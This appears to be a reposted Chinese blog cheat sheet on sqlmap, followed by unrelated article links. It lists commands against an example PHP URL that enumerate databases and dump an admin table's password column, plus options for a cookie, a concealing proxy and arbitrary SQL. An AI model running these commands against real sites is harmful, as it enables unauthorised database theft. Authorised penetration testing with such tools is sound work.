博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
sqlmap注入常见用法一条龙 【转】
阅读量:5863 次
发布时间:2019-06-19

本文共 764 字,大约阅读时间需要 2 分钟。

sqlmap是一个灰常强大的sql注入检测与辅助工具,但是由于没有图形界面,基本上用起来比较麻烦,导致很多人可能宁愿用havij或者是pangonlin也不愿意麻烦去翻帮助界面,我自己也是把很多语句贴到了一个记事本里面用,其实真正用起来也就5,6句,也不会太复杂,下文以php+mysql为例:

检查注入点
sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11
列数据库信息
sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 --dbs
指定库名列出所有表
sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 --tables
指定库名表名列出所有字段
sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin --columns
指定库名表名字段dump出指定字段
sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin -C ac,id,password --dump有几个参数可能会用到,直接加在最后面就可以了,更多详细参数见官方文档:
--cookie=COOKIE                 在需要登录的地方,需要登录后的cookie
--proxy="http://127.0.0.1:8087" 使用HTTP代理隐藏自己的身份,比如使用goagent等
--sql-query=QUERY               执行一个sql语句,不一定支持

转载地址:http://maunx.baihongyu.com/

你可能感兴趣的文章
我的友情链接
查看>>
纯静态文件环境下的Nginx优化思路
查看>>
Sublime Text 3中文乱码问题
查看>>
mysql用户权限更改
查看>>
POJ 2991 Crane 线段树 向量的旋转变换
查看>>
我的友情链接
查看>>
怎么用pfSense为你的web服务做负载均衡
查看>>
VMware workstation 9发布
查看>>
php编译安装error: Don't know how to define struct flock on this system, set --enable-opcache=no
查看>>
ps 用法
查看>>
emma的几个不足之处
查看>>
Why Not Mix Signed and Unsigned Values in C/C++?
查看>>
关于工资的三个秘密
查看>>
一起学习linux之LAMP环境的搭建
查看>>
windows server 2003 登陆界面变成黑色,用户名和密码的对话框都看不到问题处理...
查看>>
数组去掉重复项并统计出现次数
查看>>
创建数据库和表
查看>>
selenium-2 使用xpath定位元素
查看>>
elasticsearch
查看>>
P2614 计算机弹琴
查看>>